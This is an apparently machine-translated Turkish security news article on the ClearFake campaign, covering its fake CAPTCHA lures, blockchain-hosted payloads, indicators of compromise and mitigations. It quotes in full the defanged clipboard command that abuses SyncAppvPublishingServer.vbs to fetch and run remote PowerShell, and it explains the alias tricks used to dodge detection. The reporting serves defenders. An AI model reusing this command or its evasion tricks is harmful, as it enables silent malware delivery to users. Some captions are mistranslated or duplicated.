ClearFake kötü amaçlı yazılımı, Güvenilir Windows Özelliği aracılığıyla Kötü Amaçlı PowerShell Komutlarını Çalıştırmak için Proxy Yürütmesini İstismar Ediyor


ClearFake kötü amaçlı yazılım kampanyasının, uç nokta tespit sistemlerini atlatmak için meşru Windows bileşenlerini kötüye kullanan gelişmiş kaçırma teknikleri kullanan karmaşık bir evrimi ortaya çıktı.

Ağustos 2025’ten bu yana yüzlerce web sitesinin güvenliğini ihlal eden operasyon, artık kötü amaçlı PowerShell kodunu sessizce yürütmek için güvenilir bir Windows komut dosyasındaki bir komut ekleme güvenlik açığından yararlanıyor ve aynı zamanda yayından kaldırmalara direnmek için altyapısını blockchain ağlarında ve içerik dağıtım ağlarında barındırıyor.

ClearFake, web sunucularını tehlikeye atan ve meşru web sitelerine kötü amaçlı kodlar enjekte eden, JavaScript tabanlı bir kötü amaçlı yazılım dağıtım çerçevesidir.

Ziyaretçiler virüslü sayfalara geldiklerinde, kendilerini kötü amaçlı yazılım yüklemeleri için kandırmak amacıyla sosyal mühendisliği kullanan sahte CAPTCHA zorluklarıyla karşılaşırlar.

Kampanya, kullanıcılara Windows Çalıştır iletişim kutusunu açmak için “Win + R” tuşlarına basmalarını, ardından gizli bir kötü amaçlı komutu yapıştırmak için “Ctrl + V” tuşlarını kullanmalarını ve ardından bunu yürütmek için Enter tuşuna basmalarını söyleyen ClickFix adı verilen bir teknik kullanıyor.

Perde arkasında web sayfası, kötü amaçlı PowerShell komutunu kurbanın bilgisi olmadan zaten kurbanın panosuna kopyalamıştır.

Bu görselin boş bir alt özelliği var; dosya adı clearfake-1.png. Kullanıcılar “Ben robot değilim” seçeneğine tıkladıktan sonra sosyal mühendislik cazibesi ile karşı karşıya kalıyorlar ( Kaynak : ihraç).
Kullanıcılar “Ben robot değilim” seçeneğini tıkladıktan sonra kendilerine sosyal mühendislik cazibesi sunulur (Kaynak: sınırdışı).

Güvenlik araştırmacıları, ClearFake’in, operatörlerin web sitelerine toplu erişim sağladığı ve yüklerini virüslü ağ üzerinden dağıtmak isteyen diğer tehdit aktörlerine erişim sattığı bir trafik dağıtım sistemi olarak çalıştığını belirtti.

Bu iş modeli, kampanya aracılığıyla sunulan çok çeşitli kötü amaçlı yazılım ailelerini açıklıyor.

Komuta Kontrol Altyapısı

En yeni ClearFake çeşidi, BNB Smart Chain test ağında barındırılan akıllı sözleşmelerden yükleri alan çok aşamalı bir JavaScript enfeksiyon zinciri kullanıyor.

Güvenliği ihlal edilen ilk web sayfası, 0xA1decFB75C8C0CA28C10517ce56B710baf727d2e akıllı sözleşme adresinden veri almak için bir işlevi çağıran Base64 kodlu, gizlenmiş JavaScript içeriyor.

Yanıtın kodu Base64 ile çözülür ve yürütülür, böylece blok zincirinden bir sonraki aşama yükü alınır.

EtherHiding olarak bilinen bu teknik, blockchain verilerinin değişmez ve herkesin erişimine açık olması nedeniyle tehdit aktörlerine yayından kaldırılmaya karşı dayanıklı bir altyapı sağlıyor.

Yalnızca akıllı sözleşmeyi oluşturan cüzdan sahibi içeriğini değiştirebilir, barındırılan kötü amaçlı kodu herkes alabilir.

Kampanya, iki ana işleve sahip akıllı sözleşmeler kullanıyor: isteğe bağlı verileri depolamak için set() (sözleşme sahibi tarafından kontrol edilir) ve depolanan yükleri almak için get() (herkes tarafından erişilebilir).

İşlem günlükleri, akıllı sözleşmenin 21 Ağustos 2025’te oluşturulmasından bu yana yaklaşık 149.199 benzersiz sistem tanımlayıcısının gönderildiğini ve bu sayının 150.000’e yakın enfeksiyona işaret ettiğini ortaya koyuyor.

Akıllı sözleşme oluşturulduğundan bu yana günlük enfeksiyon sayısını detaylandıran bir grafik (Kaynak: ihraç).
Akıllı sözleşme oluşturulduğundan bu yana günlük enfeksiyon sayısını detaylandıran bir grafik (Kaynak: ihraç).

Kampanya, virüs bulaşmış her sisteme evrensel olarak benzersiz bir tanımlayıcı atar ve zaten güvenliği ihlal edilmiş olan kurbanların yeniden bulaşmasını önlemek için bunu bir akıllı izleme sözleşmesine yükler.

Bu ClearFake kampanyasındaki en önemli gelişme, uç nokta tespiti ve yanıt çözümlerinden kaçınmak için proxy yürütmenin benimsenmesidir.

Kötü amaçlı yazılım artık güvenlik uyarılarını tetikleyen powershell.exe veya mshta.exe dosyasını doğrudan çağırmak yerine, C:\Windows\System32 konumunda bulunan meşru bir Windows sistem dosyası olan SyncAppvPublishingServer.vbs’yi kötüye kullanıyor.

Kurbanın panosuna kopyalanan kötü amaçlı komut şuna benzer: SyncAppvPublishingServer.vbs "n;&(gal i*x)(&(gcm *stM*) 'cdn.jsdelivr[.]net/gh/clock-cheking/expert-barnacle/load')".

SyncAppvPublishingServer.vbs, App-V ortamlarını senkronize etmek için tasarlanmıştır ancak komut ekleme güvenlik açığı içerir.

Komut dosyası, kullanıcı tarafından sağlanan bağımsız değişkenleri birleştirerek PowerShell komutları oluşturur ve PowerShell ifadeleri noktalı virgüllerle ayrıldığından, saldırganlar sahte bir sunucu adı ve ardından noktalı virgül sağladıktan sonra rastgele kod enjekte edebilir.

Bu tekniğin avantajı, SyncAppvPublishingServer.vbs’nin Microsoft tarafından dijital olarak imzalanmış güvenilir bir Windows bileşeni olması ve PowerShell’i gizli modda (-WindowStyle Hidden) başlatarak kötü amaçlı etkinliği kullanıcılar için görünmez hale getirmesidir.

Güvenlik ürünlerinin bu davranışı engellemesi pek olası değildir çünkü bu, bileşenin meşru işlevselliğini bozacaktır.

Komut Gizleme

PowerShell komutunun kendisi birden fazla kaçınma tekniği kullanır. Kötü amaçlı yazılım, “Invoke-Expression” veya “Invoke-WebRequest” gibi kolayca algılanan komutları kullanmak yerine PowerShell takma adlarını ve joker karakter modellerini kullanır: &(gal i*x), “i*x” kalıbıyla eşleşerek Invoke-Expression takma adını alırken &(gcm *stM*) Invoke-RestMethod ile eşleşir.

Bu yaklaşım, komut dosyalarında belirli komut adlarını arayan imza tabanlı algılama kurallarından kaçınır.

Kuruluşlar, Web3 teknolojileri gerekli değilse, blockchain ağlarıyla (bsc-testnet.drpc.org ve data-seed-prebsc-1-s1.bnbchain.org) iletişim kurmak için kullanılan RPC uç noktalarını engelleyerek ClearFake saldırılarını azaltabilir.

SyncAppvPublishingServer.vbs yürütmesinin engellenmesi veya kısıtlanması ya da yalnızca meşru işlemler için gereken belirli komut parametrelerinin izin verilenler listesine eklenmesi, proxy yürütme tekniğini engelleyebilir.

Betiğe iletilen bağımsız değişkenlerdeki noktalı virgüllere yönelik komut satırı incelemesi, birçok yararlanma girişimini de engelleyebilir.

En etkili savunma, yönetici olmayan kullanıcılar için PowerShell yürütmesini kısıtlamaktır; ancak bu, yaygın uygulama bağımlılıkları nedeniyle genellikle pratik değildir.

Hiçbir meşru web sitesi doğrulama süreci bu eylemleri gerektirmediğinden, güvenlik ekipleri, çalışanları sahte CAPTCHA istemleri konusunda uyaran ve onlara Çalıştır iletişim kutularını açma veya komutları yapıştırma talimatı veren kullanıcı eğitim programları uygulamalıdır.

IOC’ler

TipAçıklama / Adres
İlk aşama akıllı sözleşme adresi0xA1decFB75C8C0CA28C10517ce56B710baf727d2e
İkinci aşama akıllı sözleşme adresi0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff
UUID izleyici akıllı sözleşme adresi0xf4a32588b50a59a82fbA148d436081A48d80832A
Sözleşme sahibinin cüzdan adresi0xd71f4cdC84420d2bd07F50787B4F998b4c2d5290
PowerShell verisi URL’sicdn.jsdelivr[.]net/gh/clock-cheking/expert-barnacle/load

Anında Güncellemeler Almak ve GBH’yi Google’da Tercih Edilen Kaynak Olarak Ayarlamak için bizi Google Haberler, LinkedIn ve X’te takip edin.



Source link